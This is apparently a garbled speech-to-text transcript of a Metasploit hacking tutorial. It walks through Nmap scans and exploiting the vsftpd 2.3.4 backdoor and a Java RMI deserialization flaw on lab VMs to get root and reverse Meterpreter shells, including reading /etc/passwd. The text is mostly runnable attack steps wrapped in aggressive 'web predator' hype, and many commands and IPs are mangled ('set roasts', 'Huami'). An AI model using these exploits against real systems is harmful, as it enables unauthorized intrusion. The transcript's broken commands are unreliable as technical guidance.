what it does, why it works, commands, options, risks, and tips. Follow along in your Linux VM. Step 1. Using Nmap to find open doors. Before exploiting, we need targets. Nmap is king here. Faster, stealthier, and more detailed than Metasploit auxiliaries for initial scans. It maps the network like a blueprint. Why Nmap? It detects hosts, ports, services, versions, and operating systems, revealing open doors like FTP on port 21. It's more powerful than Metasploit scanners because of the Nmap scripting engine and evasion options. Prepare your lab. Attacker, Linux VM. Target, Metasploitable2 VM, a vulnerable Linux box. Network, same virtual network, for example, NAT or host only. Note the target IP, assume 192.168.89.109. Why? Safe, isolated environment. Snapshot VMS before testing. Basic host discovery. Command, nmap-sn 192.168.1.0/24. What it does. Pings the subnet without port scanning to find alive hosts quickly. Why? Confirms the target is up without noisy scanning. Tip: if ping is blocked, use -pn to assume host is up. Risk: too aggressive scans increase detection, start slow. Port and service scan. Command: nmap-p-sv192.168.89.109. What it does: scans all 65,535 ports and detects service versions. Why? Finds open doors, for example, 21/TCP open FTP vs FTPD 2.3.4, which reveals our target vulnerability. Tip: for speed, scan top ports with -P1 to 1000. Add -A for OS, scripts, and traceroute. Full scans take time. Use -min rate to accelerate if necessary. Step 2. Launching the exploit in Metasploit. With Nmap intel showing FTP open and VSFTPD 2.3.4, we trigger the backdoor. This backdoor opens a service on port 6200 after the trigger. No payload is needed. It gives a shell directly. Why this exploit? It's simple and reliable. It's a great teaching example. This is the real CVE 2011-2523. Start. Metasploit, command, MSF console. What it does: launches the framework's interactive console. Search for the exploit, command, search VSFTPD. What it does: finds modules related to VSFTPD, e.g. exploit/unix/ftp/vsftpd _234_ backdoor. Load the exploit. Command: use exploit/unix/ftp/vsftpd _234_ backdoor. What it does: loads the module for configuration and execution. View info and options. Command: info. What it does: shows description, references, rank, and targets. Command: show options. What it does: lists required and optional settings, for example, roasts and report. Set required options. Command: set roasts 192.168.8.9.109. Optional: set RPORT 21 if needed. Check compatibility. Command: check what it does. Probes the target safely to confirm vulnerability. Not all modules implement check, but this one does. Fire the exploit. Command: exploit what it does. Connects to FTP, sends the crafted username trigger, waits for the backdoor on port 6200, connects, and provides a root shell. Expected result: you receive a shell prompt. Run Huami to confirm UID equals 0 root. Tip: if it fails, you'll see errors. Common causes are wrong version or wrong target IP. Retry or run the exploit as a background job with exploit-j. Risk: the service may crash. Only perform this in your lab with permission. Interact and verify. Inside the shell, run commands like ls or cat python-etc/passwd to confirm access. Use python-c quote import pty:/pty.spawn/bin/bash end quote to upgrade the shell for better interaction. Pro tip: this exploit uses its built-in behavior rather than setting a separate payload. In more advanced scenarios, you can choose a payload with show payloads. Always clean up by reverting your VM snapshot. You just claimed your first victim. Part 6. Web server hacking. We invade the web. Click now. More blood awaits. System owned. One vulnerability, one click. Entire web server gone. The internet? We bend it. We break it. We own it. Skip this part. You stay outside the gate forever. This is Metasploit Masterclass, turning beginners into web predators. Like, subscribe, bell on, or crawl back to the shadows. Let's invade. Web server hacking means attacking the core of the internet. Websites run on servers. Find one flaw and you can control files, databases, sessions, the entire machine. Ethical only. Use lab targets like DVWA, Metasploitable, or your own VMs. Real websites, illegal. You are responsible. Today, we are doing a rapid recon, Nmap plus Nikto, and then exploiting a vulnerable server using exploit/multi/ms/java_RMI_server. This targets a Java RMI deserialization weakness, a classic execute anything vulnerability. Target IP example 192.168.116.109 RMI port 1099. Everything will be explained: what it does, why it works, the commands, and the risks. Step 1. Rapid recon. Find weak spots. Short scans save time during pen tests. Nmap finds services, Nikto finds web flaws. Combining both gives you a perfect early recon. 1. Nmap. Quick port inversion. Scan Nmap. SVP80. 1099.192.168.116.109. Why? 80 equals web 1099 equals RMI-SSV shows versions to match vulnerabilities. If you see 1099/TCP open Java-RMI, perfect target. Tip: if the host doesn't reply to ping, use -PN. 2. Nikto. Web vulnerability. Probe Nikto H1 92.168.116.109. Nikto looks for outdated web servers, RMI leaks, Java version info, exposed directories, misconfigurations, example output, Java RMI registry exposed, possible deserialization vulnerability. Step 2. Exploit Java RMI with Metasploit. This exploit targets unprotected RMI registries. The server deserializes your payload remote code execution shell. 1. Launch Metasploit launch. Metasploit by typing msf console. Then wait for the prompt. 2. Search and load the exploit search Java RMI server. Here is our target exploit. Clear your terminal, then load the module with use exploit/multi/miss/Java RMI server. Check information, info. Then see all required options, show options. 3. Configure the target set roasts 192.168.116.109 set rport 1099. Confirm settings. Show options 4. Choose payload type. Show payloads. In this case, I will use the simple reverse metapreter payload. Set payload java/metapreter/reverse_TCP. 5. Optional, check first check. If you see something like Java RMI endpoint detected, classes enabled, it means the target is vulnerable. 6. Exploit access the target system by typing exploit boom. Successful. A metapreter session has opened. You now have shell access, full command execution, ability to upload a web shell. Pro tip: old Java applications are gold mines. Patch them. Update them. Java RMI vulnerabilities can compromise entire organizations. Web server compromised.